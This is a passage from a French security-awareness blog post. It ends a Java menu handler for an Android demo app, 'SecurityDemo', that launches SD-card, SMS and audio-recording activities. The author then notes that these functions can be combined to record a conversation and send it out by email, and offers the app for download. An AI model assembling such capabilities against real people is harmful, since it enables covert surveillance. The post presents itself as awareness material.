                    this.startActivity(intent);

                    finish();

                    return true;

                }

        

                case R.id.menu_sd: 

                {

                    Intent intent = new Intent(this, WriteSDDemo.class);

                    this.startActivity(intent);

                    finish();

                    return true;

                }

        

                case R.id.menu_sms: 

                {

                    Intent intent = new Intent(this, SecurityDemo.class);

                    this.startActivity(intent);

                    finish();

                    return true;

                }

  

                case R.id.menu_picture: 

                {

                    return true;

                }

  

                case R.id.menu_audio: 

                {

                    Intent intent = new Intent(this, AudioRecordTest.class);

                    this.startActivity(intent);

                    finish();

                    return true;

                }

            }

            

            return false;

        }

  

}

  



Bien sûr toutes ces fonctions peuvent être combinées, comme par exemple l'enregistrement d'une conversation, le stockage du fichier "audio" dans le système de fichiers et l"envoi de ce fichier par mail.

L'application SecurityDemo est téléchargeable ICI.

Voici quelques captures d'écrans:

N'hésitez pas à me contacter si vous souhaitez avoir plus d'informations sur cette application.

L'objectif principal de ce blog est de sensibiliser les étudiants, les développeurs et les décideurs à la sécurité: des applications web aux clefs USB. Cette sensibilisation passe par la présentation d'outils et des scénarii d'attaques les plus communément utilisés. Ce blog traite également de la sécurité "appliquée" à notre vie de tous les jours et autres sujets connexes.

Bien entendu l'usage des informations présentes dans ce blog doit uniquement se faire dans un cadre "éthique".

Note: les opinions, les prises de position et le contenu de ce blog n'engagent que son auteur, et ce, à titre personnel seulement. En d'autres termes, le contenu du blog ne représente aucunement la position officielle de mon employeur.

Vers l'infini et au-delà...! (*)